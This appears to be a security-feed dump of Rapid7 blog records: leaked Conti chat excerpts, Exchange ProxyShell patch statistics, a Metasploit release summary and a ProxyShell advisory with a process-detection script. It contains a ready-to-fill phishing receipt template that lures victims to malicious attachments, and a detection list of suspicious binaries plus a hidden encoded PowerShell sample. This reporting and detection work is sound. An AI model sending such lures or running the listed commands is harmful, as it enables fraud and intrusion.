All {required documentation|necessary documents|important documentation|documents you need|details that can be important|essential documents} {can be found|you can find} in the {attached file|file attached}. \nT: {Invoicing|Invoice|Agreement|Contract|Payment} {info|data|information|details} \nD: {Receipt|Bill} {id|ID|Number|number|No.|No.|No|#|##} 3212-inv8\n\n{Greetings|Hello|Good day|Good afternoon}{!|,|} \n{Thank you for|We are thankful for|We are grateful for|Many thanks for} {your|your recent} {on-line order|purchase order|order}. {We|Our financiers have|Our team has|We have|Our shop has} {received|collected|processed|checked} your {payment|advance payment|money transfer|funds transfer} \u041d\u041e\u041c\u0415\u0420 \u041f\u0415\u0420\u0415\u0412\u041e\u0414\u0410. Now we {are and ready to|begin to} {pack|prepare|compose} your {shipment|order|box}. Your {parcel|packet|shipment|box} {will|is going to|would} {arrive|be delivered} to {you|your residence} within {4|5|6|four|five|six} {days|business days}. \n{Total|Full|Whole} {order|purchase|payment} sum: \u0421\u0423\u041c\u041c\u0410 \nYou {can find|will find} {all|full} {relative information|order info|order and payment details} and your {receipt|check} \u041d\u041e\u041c\u0415\u0420 \u0427\u0415\u041a\u0410 {in|in the} {attached file|file attached}. 
\n{Thank you!|Have a nice day!} \n\u0422\u0415\u041c\u042b: Your {order|purchase|on-line order|last order} \u041d\u041e\u041c\u0415\u0420 \u0417\u0410\u041a\u0410\u0417\u0410 payment {processed|obtained|received} \n\u0410\u0422\u0422\u0410\u0427\u0418: \nord_conf \nfull.details \ncompl_ord_7847 \nbuyer_auth_doc \ninfo_summr \ncustomer_docs \nspec-ed_info\n\n \n_**Additional reading**_\n\n * _[Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>)_\n * _[Staying Secure in a Global Cyber Conflict](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/>)_\n * _[Prudent Cybersecurity Preparation for the Potential Russia-Ukraine Conflict](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>)_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-03-01T19:15:58", "type": "rapid7blog", "title": "Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2020-1472", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-44228"], "modified": "2022-03-01T19:15:58", "id": "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "href": "https://blog.rapid7.com/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-06T15:02:24", "description": "\n\nIf you've been keeping tabs on the state of vulnerabilities, you've probably noticed that Microsoft Exchange has been in the news more than usual lately. Back in March 2021, Microsoft [acknowledged a series of threats](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) exploiting zero-day CVEs in on-premises instances of Exchange Server. Since then, several related exploit chains targeting Exchange have [continued to be exploited in the wild](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>).\n\nMicrosoft [quickly](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) [released](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) [patches](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>) to help security teams keep attackers out of their Exchange environments. 
So, what does the state of patching look like today among organizations running impacted instances of Exchange?\n\nThe answer is more mixed \u2014 and more troubling \u2014 than you'd expect.\n\n## What is Exchange, and why should you care?\n\nExchange is a popular email and messaging service that runs on Windows Server operating systems, providing email and calendaring services to tens of thousands of organizations. It also integrates with unified messaging, video chat, and phone services. That makes Exchange an all-in-one messaging service that can handle virtually all communication streams for an enterprise customer.\n\nAn organization's Exchange infrastructure can contain copious amounts of sensitive business and customer information in the form of emails and a type of shared mailbox called Public Folders. This is one of the reasons why Exchange Server vulnerabilities pose such a significant threat. Once compromised, Exchange's search mechanisms can make this data easy to find for attackers, and a robust rules engine means attackers can create hard-to-find automation that forwards data out of the organization.\n\nAn attacker who manages to get into an organization's Exchange Server could gain visibility into their Active Directory or even compromise it. They could also steal credentials and impersonate an authentic user, making phishing and other attempts at fraud more likely to land with targeted victims.\n\n## Sizing up the threats\n\nThe credit for discovering this recent family of Exchange Server vulnerabilities goes primarily to security researcher Orange Tsai, who overviewed them in an August 2021 [Black Hat talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>). 
He cited 8 vulnerabilities, which resulted in 3 exploit chains:\n\n * **ProxyLogon:** This vulnerability could allow attackers to use pre-authentication server-side request forgery (SSRF) plus a post-authentication arbitrary file write, resulting in remote code execution (RCE) on the server.\n * **ProxyOracle:** With a cookie from an authenticated user (obtained through a reflected XSS link), a Padding Oracle attack could provide an intruder with plain-text credentials for the user.\n * **ProxyShell:** Using a pre-authentication access control list (ACL) bypass, a PrivEsc (not going up to become an administrator but down to a user mailbox), and a post-authentication arbitrary file write, this exploit chain could allow attackers to execute an RCE attack.\n\nGiven the sensitivity of Exchange Server data and the availability of [patches and resources from Microsoft](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) to help defend against these threats, you'd think adoption of these patches would be almost universal. But unfortunately, the picture of patching for this family of vulnerabilities is still woefully incomplete.\n\n## A patchwork of patch statuses\n\nIn Rapid7's OCTO team, we keep tabs on the exposure for major vulnerabilities like these, to keep our customers and the security community apprised of where these threats stand and if they might be at risk. To get a good look at the patch status among Exchange Servers for this family of attack chains, we had to develop new techniques for fingerprinting Exchange versions so we could determine which specific hotfixes had been applied.\n\nWith a few tweaks, we were able to adjust our measurement approach to get a clear enough view that we can draw some strong conclusions about the patch statuses of Exchange Servers on the public-facing internet. 
Here's what we found:\n\n * Out of the 306,552 Exchange OWA servers we observed, 222,145 \u2014 or 72.4% \u2014were running an impacted version of Exchange (this includes 2013, 2016, and 2019).\n * Of the impacted servers, 29.08% were still unpatched for the ProxyShell vulnerability, and 2.62% were partially patched. That makes 31.7% of servers that may still be vulnerable.\n\n\n\nTo put it another, starker way: 6 months after patches have been available for the ProxyLogon family of vulnerabilities, 1 in 3 impacted Exchange Servers are still susceptible to attacks using the ProxyShell method.\n\nWhen we sort this data by the Exchange Server versions that organizations are using, we see the uncertainty in patch status tends to cluster around specific versions, particularly 2013 Cumulative Update 23. \n\n\n\nWe also pulled the server header for these instances with the goal of using the version of IIS as a proxy indicator of what OS the servers may be running \u2014 and we found an alarmingly large proportion of instances that were running end-of-life servers and/or operating systems, for which Microsoft no longer issues patch updates.\n\n\n\nThat group includes the two bars on the left of this graph, which represent 2007 and 2010 Exchange Server versions: 75,300 instances of 2010 and 8,648 instances of 2007 are still running out there on the internet, roughly 27% of all instances we observed. Organizations still operating these products can count themselves lucky that ProxyShell and ProxyLogon don't impact these older versions of Exchange (as far as we know). But that doesn't mean those companies are out of the woods \u2014 if you still haven't replaced Exchange Server 2010, you're probably also doing other risky things in your environment.\n\nLooking ahead, the next group of products that will go end-of-life are the Windows Server 2012 and 2012 R2 operating systems, represented in green and yellow, respectively, within the graph. 
That means 92,641 instances of Exchange \u2014 nearly a third of all Exchange Servers on the internet \u2014 will be running unsupported operating systems for which Microsoft isn't obligated to provide security fixes after they go end-of-life in 2023.\n\n## What you can do now\n\nIt's a matter of when, not if, we encounter the next family of vulnerabilities that lets attackers have a field day with huge sets of sensitive data like those contained in Exchange Servers. And for companies that haven't yet patched, ProxyShell and its related attack chains are still a real threat. Here's what you can do now to proactively mitigate these vulnerabilities.\n\n * First things first: If your organization is running one of the 1 in 3 affected instances that are vulnerable due to being unpatched, [install the appropriate patch](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) right away.\n * Stay current with patch updates as a routine priority. It is possible to build Exchange environments with near-100% uptimes, so there isn't much argument to be made for forgoing critical patches in order to prevent production interruptions.\n * If you're running a version of Exchange Server or Windows OS that will soon go end-of-life, start planning for how you'll update to products that Microsoft will continue to support with patches. This way, you'll be able to quickly and efficiently mitigate vulnerabilities that arise, before attackers take advantage of them.\n\nIf you're already a Rapid7 customer, there's good news: [InsightVM](<https://www.rapid7.com/products/insightvm/>) already has authenticated scans to detect these vulnerabilities, so users of the product should already have a good sense of where their Exchange environments stand. 
On the offensive side, your red teams and penetration testers can highlight the risk of running vulnerable Exchange instances with modules exercising [ProxyLogon](<https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxylogon_rce/>) and [ProxyShell](<https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/>). And as our research team continues to develop techniques for getting this kind of detailed information about exposures, we ensure our products know about those methods so they can more effectively help customers understand their vulnerabilities.\n\nBut for all of us, these vulnerabilities are a reminder that security requires a proactive mindset \u2014 and failing to cover the basics like upgrading to supported products and installing security updates leaves organizations at risk when a particularly thorny set of attack chains rears its head.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T14:07:12", "type": "rapid7blog", "title": "For Microsoft Exchange Server Vulnerabilities, Patching Remains Patchy", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-06T14:07:12", "id": "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720", "href": "https://blog.rapid7.com/2021/10/06/for-microsoft-exchange-server-vulnerabilities-patching-remains-patchy/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-20T20:19:12", "description": "## Anyone enjoy making chains?\n\n\n\nThe community is hard at work building chains to pull sessions out of vulnerable Exchange servers. This week Rapid7's own [wvu](<https://github.com/wvu-r7>) & [Spencer McIntyre](<https://github.com/zeroSteiner>) added a module that implements the ProxyShell exploit chain originally demonstrated by [Orange Tsai](<https://twitter.com/orange_8361>). The module also benefited from research and analysis by [Jang](<https://twitter.com/testanull>), [PeterJson](<https://twitter.com/peterjson>), [brandonshi123](<https://github.com/brandonshiyay>), and [mekhalleh (RAMELLA S\u00e9bastien)](<https://twitter.com/Mekhalleh>) to make it as simple as finding an email address for an administrator of a vulnerable version of Exchange as the entry point to chain [CVE-2021-31207](<https://attackerkb.com/topics/5F0CGZWw61/cve-2021-31207?referrer=blog>), [CVE-2021-34523](<https://attackerkb.com/topics/RY7LpTmyCj/cve-2021-34523?referrer=blog>), & [CVE-2021-34473](<https://attackerkb.com/topics/pUK1MXLZkW/cve-2021-34473?referrer=blog>) into sessions for everyone to enjoy.\n\n## Great to see some GSoC value in the wild.\n\nWith Google Summer of Code 2021 moving into its final phases, [pingport80](<https://github.com/pingport80>) had 4 PRs land in this week's release. 
These improvements and fixes to interactions with sessions make post-exploitation tasks more accessible, bringing the community more capabilities and stability along the way.\n\n## New module content (2)\n\n * [Lucee Administrator imgProcess.cfm Arbitrary File Write](<https://github.com/rapid7/metasploit-framework/pull/15525>) by [wvu](<https://github.com/wvu-r7>), [iamnoooob](<https://github.com/iamnoooob>), and [rootxharsh](<https://github.com/rootxharsh>), which exploits [CVE-2021-21307](<https://attackerkb.com/topics/16OOl6KSdo/cve-2021-21307?referrer=blog>) \\- An unauthenticated user is permitted to make requests through the `imgProcess.cfm` endpoint, and using the `file` parameter, which contains a directory traversal vulnerability, they can write a file to an arbitrary location. Combining the two capabilities, this module writes a CFML script to the vulnerable server and achieves unauthenticated code execution as the user running the Lucee server.\n * [Microsoft Exchange ProxyShell RCE](<https://github.com/rapid7/metasploit-framework/pull/15561>) by [wvu](<https://github.com/wvu-r7>), [Jang](<https://twitter.com/testanull>), [Orange Tsai](<https://twitter.com/orange_8361>), [PeterJson](<https://twitter.com/peterjson>), [Spencer McIntyre](<https://github.com/zeroSteiner>), [brandonshi123](<https://github.com/brandonshiyay>), and [mekhalleh (RAMELLA S\u00e9bastien)](<https://twitter.com/Mekhalleh>), which exploits [CVE-2021-31207](<https://attackerkb.com/topics/5F0CGZWw61/cve-2021-31207?referrer=blog>) \\- Added an exploit for the ProxyShell attack chain against Microsoft Exchange Server.\n\n## Enhancements and features\n\n * [#15540](<https://github.com/rapid7/metasploit-framework/pull/15540>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This adds an option to `cmd_execute` to have the command run in a subshell by Meterpreter.\n * [#15556](<https://github.com/rapid7/metasploit-framework/pull/15556>) from [pingport80](<https://github.com/pingport80>) 
\\- This adds shell session compatibility to the `post/windows/gather/enum_unattend` module.\n * [#15564](<https://github.com/rapid7/metasploit-framework/pull/15564>) from [pingport80](<https://github.com/pingport80>) \\- This adds support to the `get_env` and `command_exists?` post API methods for Powershell session types.\n\n## Bugs fixed\n\n * [#15303](<https://github.com/rapid7/metasploit-framework/pull/15303>) from [pingport80](<https://github.com/pingport80>) \\- This PR ensures that the shell `dir` command returns a list.\n * [#15332](<https://github.com/rapid7/metasploit-framework/pull/15332>) from [pingport80](<https://github.com/pingport80>) \\- This improves localization support and compatibly in the session post API related to the `rename_file` method.\n * [#15539](<https://github.com/rapid7/metasploit-framework/pull/15539>) from [tomadimitrie](<https://github.com/tomadimitrie>) \\- This improves the OS version in the `check` method of `exploit/windows/local/cve_2018_8453_win32k_priv_esc`.\n * [#15546](<https://github.com/rapid7/metasploit-framework/pull/15546>) from [timwr](<https://github.com/timwr>) \\- This ensures that the UUID URLs of stageless reverse_http(s) payloads are stored in the database so that they can be properly tracked with payload UUID tracking. 
This also fixes an error caused by accessing contents of a url list without checking if it's valid first.\n * [#15570](<https://github.com/rapid7/metasploit-framework/pull/15570>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug in the `auxiliary/scanner/smb/smb_enum_gpp` module where the path that was being generated by the module caused an SMB exception to be raised.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.0...6.1.1](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-08-12T17%3A57%3A38%2B01%3A00..2021-08-20T05%3A13%3A43-05%3A00%22>)\n * [Full diff 6.1.0...6.1.1](<https://github.com/rapid7/metasploit-framework/compare/6.1.0...6.1.1>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-20T19:12:00", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21307", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T19:12:00", "id": "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "href": "https://blog.rapid7.com/2021/08/20/metasploit-wrap-up-126/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-25T18:57:37", "description": "\n\n_This attack is ongoing. See the `Updates` section at the end of this post for new information as it comes to light. 
Rapid7 also has a [technical analysis of the ProxyShell exploit chain](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>) in AttackerKB._\n\nOn August 5, 2021, in [a Black Hat USA talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>), DEVCORE researcher Orange Tsai shared information on [several exploit chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) targeting on-premises installations of Microsoft Exchange Server. Among the exploit chains presented were ProxyLogon, which was [exploited en masse in February and March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) of 2021, and ProxyShell, an attack chain originally demonstrated at the Pwn2Own hacking competition this past April. As of August 12, 2021, multiple researchers have detected widespread opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using the ProxyShell chain.\n\nAccording to Orange Tsai's demonstration, the ProxyShell exploit chain allows a remote unauthenticated attacker to execute arbitrary commands on a vulnerable on-premises instance of Microsoft Exchange Server via port 443. 
The exploit is comprised of three discrete CVEs:\n\n * [CVE-2021-34473](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-34473/>), a remote code execution vulnerability [patched April 13, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>)\n * [CVE-2021-34523](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-34523/>), an elevation of privilege vulnerability [patched April 13, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>)\n * [CVE-2021-31207](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-31207/>), a security feature bypass [patched May 11, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>)\n\n_While CVE-2021-34473 and CVE-2021-34523 were patched in April, Microsoft\u2019s advisories note that they were inadvertently omitted from publication until July._\n\nWhen chained, these vulnerabilities allow the attacker to bypass ACL controls, send a request to a PowerShell back-end, and elevate privileges, effectively authenticating the attacker and allowing for remote code execution. Both public and private proof-of-concept exploits have been released as of August 18, 2021\u2014not surprising, since ProxyShell was first demonstrated more than four months ago at Pwn2Own. A number of [technical analyses](<https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/>) of the chain have also [been published](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>). 
See Rapid7's exploit chain analysis [in AttackerKB](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>).\n\nNotably, there has been confusion about which CVE is which across various advisories and research descriptions \u2014 Microsoft, for instance, describes CVE-2021-34473 as a remote code execution vulnerability, but [Orange Tsai\u2019s Black Hat slides](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>) list CVE-2021-34473 as the initial ACL bypass. Community researchers have also [expressed confusion](<https://twitter.com/GossiTheDog/status/1424791670076411905>) over CVE numbering across the ProxyShell chain, but ultimately, the takeaway is the same: Organizations that have not patched these vulnerabilities should do so on an emergency basis and invoke incident response protocols to look for indicators of compromise.\n\n## Affected products\n\nThe following versions of Exchange Server are vulnerable to all three ProxyShell CVEs:\n\n * Microsoft Exchange Server 2019 Cumulative Update 9\n * Microsoft Exchange Server 2019 Cumulative Update 8\n * Microsoft Exchange Server 2016 Cumulative Update 20\n * Microsoft Exchange Server 2016 Cumulative Update 19\n * Microsoft Exchange Server 2013 Cumulative Update 23\n\nOrganizations that rely on on-premises installations of Exchange Server and are not able to move to O365 should ensure that all Exchange instances are patched on a zero-day basis. 
In order to do this, it is vital that defenders keep up-to-date with quarterly Cumulative Updates, since Microsoft only releases security fixes for [the most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>).\n\nWhile ProxyShell and March\u2019s ProxyLogon exploit chain are the two attacks that have already resulted in widespread exploitation, they are not the only exploit chains targeting on-premises Exchange servers. Exchange continues to be a valuable and accessible attack surface for both sophisticated and run-of-the-mill threat actors, and we will certainly see additional widespread exploitation in the future.\n\nRead more from our emergent threat response team on [high-priority attack surface area](<https://www.rapid7.com/blog/post/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/>), including Windows Print Spooler and Pulse Connect Secure VPNs.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to all three ProxyShell CVEs with authenticated vulnerability checks.\n\nThe following attacker behavior detection is available to InsightIDR customers:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\nThis detection will identify processes spawned by Microsoft IIS processes that have been configured to serve as Outlook Web Access web servers for Microsoft Exchange. Rogue processes being spawned may be an indication of a successful attack against these systems, and this behavior has been observed in attacks by various malicious actors.\n\nIf this detection fires in your environment, you should determine whether it is part of authorized administrator activity. Examine the parent process that spawned the command, and anything else that process may have spawned. 
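The detection described above can be prototyped over process-creation telemetry. This is an added example, not Rapid7's InsightIDR rule: it takes Sysmon Event ID 1-style records (Image, CommandLine, ParentImage, ParentCommandLine), keeps only children of `w3wp.exe` workers whose `-ap` argument names an Exchange front-end application pool, and flags shells, interpreters and download utilities among them. The event records are constructed for the illustration; the pool names are the ones Exchange creates, and the suspicious-binary list is a starting point to tune, not a complete one.

```python
import ntpath
import re
from typing import Dict, Iterable, List

# App pools that front Exchange's OWA and ECP virtual directories. A webshell
# written through the ProxyShell chain executes inside one of these workers,
# so their child processes are the signal.
EXCHANGE_WEB_POOLS = {"MSExchangeOWAAppPool", "MSExchangeECPAppPool"}

# Binaries an IIS worker process has no business launching (tune per site).
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "rundll32.exe",
    "mshta.exe", "wscript.exe", "cscript.exe", "bitsadmin.exe", "net.exe",
}

# IIS starts workers as:  w3wp.exe -ap "<pool>" -v "v4.0" -l "webengine4.dll" ...
POOL_RE = re.compile(r'-ap\s+(?:"([^"]+)"|(\S+))')


def pool_name(cmdline: str) -> str:
    """Return the application pool named in a w3wp.exe command line ('' if none)."""
    m = POOL_RE.search(cmdline)
    if not m:
        return ""
    return m.group(1) or m.group(2)


def is_suspicious(event: Dict[str, str]) -> bool:
    """True when the parent is an Exchange web worker and the child is on the list."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if parent != "w3wp.exe":
        return False
    if pool_name(event.get("ParentCommandLine", "")) not in EXCHANGE_WEB_POOLS:
        return False
    child = ntpath.basename(event.get("Image", "")).lower()
    return child in SUSPICIOUS_CHILDREN


def triage(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the events worth an analyst's attention, in input order."""
    return [e for e in events if is_suspicious(e)]


W3WP = r"C:\Windows\System32\inetsrv\w3wp.exe"
OWA_POOL = r'C:\Windows\System32\inetsrv\w3wp.exe -ap "MSExchangeOWAAppPool" -v "v4.0" -l "webengine4.dll"'
ECP_POOL = r'C:\Windows\System32\inetsrv\w3wp.exe -ap "MSExchangeECPAppPool" -v "v4.0" -l "webengine4.dll"'
DEFAULT_POOL = r'C:\Windows\System32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v4.0" -l "webengine4.dll"'

# Constructed sample events for the illustration; not captured from a real host.
SAMPLE_EVENTS = [
    {"ProcessId": "4412", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c "whoami & net user"',
     "ParentImage": W3WP, "ParentCommandLine": OWA_POOL},
    {"ProcessId": "5120", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc AAAA",
     "ParentImage": W3WP, "ParentCommandLine": ECP_POOL},
    {"ProcessId": "5204", "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": "csc.exe /noconfig /fullpaths @tmp.cmdline",   # ASP.NET compiling a view: expected
     "ParentImage": W3WP, "ParentCommandLine": OWA_POOL},
    {"ProcessId": "5310", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir",                               # non-Exchange pool: outside this rule
     "ParentImage": W3WP, "ParentCommandLine": DEFAULT_POOL},
    {"ProcessId": "5400", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe",                                      # interactive admin shell
     "ParentImage": r"C:\Windows\explorer.exe", "ParentCommandLine": "explorer.exe"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["ProcessId"], pool_name(hit["ParentCommandLine"]), hit["CommandLine"])
```

The benign `csc.exe` child and the `DefaultAppPool` child pass this rule on purpose: the rule is scoped to the Exchange pools so that it fires rarely enough to act on, and the triage the post recommends then starts from the flagged worker and walks its other children.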
If this activity is not benign or expected, consider rebuilding the host from a known, good source and having any possibly affected users change their passwords.\n\n## Updates\n\n**August 25, 2021:** Rapid7 estimates that there are over 84,000 Exchange servers that appear vulnerable to the ProxyShell attack chain. \n\n\n**August 23, 2021:** Multiple sources have now [reported](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that at least one ransomware gang (LockFile) is chaining ProxyShell with PetitPotam (CVE-2021-36942) to compromise Windows domain controllers. See [Rapid7's blog on PetitPotam](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>) for patching and additional required mitigation advice.\n\n**August 21, 2021:** Rapid7's Managed Detection and Response (MDR) and Incident Response (IR) teams have noted a significant uptick in Exchange exploitation by multiple threat actors. Community researchers have also noted that attackers are exploiting the ProxyShell vulnerabilities to drop webshells and [spread ransomware](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>) on vulnerable targets.\n\nWe are monitoring for additional attacker behavior and will update this blog as further information comes to light.\n\n**August 16, 2021:** We have begun to see public proof-of-concept (PoC) code implementing the ProxyShell exploit chain. 
